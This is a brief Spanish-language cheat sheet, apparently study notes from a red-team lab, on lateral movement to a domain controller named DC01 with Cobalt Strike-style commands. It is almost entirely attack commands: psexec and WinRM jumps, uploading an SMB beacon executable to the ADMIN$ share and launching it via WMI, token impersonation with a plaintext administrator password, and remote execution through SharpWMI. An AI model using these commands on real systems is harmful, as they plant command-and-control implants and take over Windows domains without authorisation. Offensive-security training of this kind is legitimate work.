Windows Management Instrumentation (WMI)
Crear un acceso con credenciales.
jump psexec DC01 smb_listener
jump winrm64 DC01 smb_listener
Ejecutar un comando en una maquina remotamente.
remote-exec winrm DC01 [command]
cd \\DC01\ADMIN$
upload c:\Tools\Payloads\smb_beacon_x64.exe
remote-exec wmi DC01 C:\Windows\smb_beacon_x64.exe
link DC01
CoInitializeSecurity
Si aparece el error CoInitializeSecurity already called al ejecutar los comandos.
make_token PAY\Administrator Qwerty123
remote-exec wmi DC01 calc
Podemos realizar lo siguiente usando SharpWMI.
execute-assembly C:\Tools\SharpWMI\SharpWMI\bin\Release\SharpWMI.exe action=exec computername=DC01 command="C:\Windows\System32\calc.exe"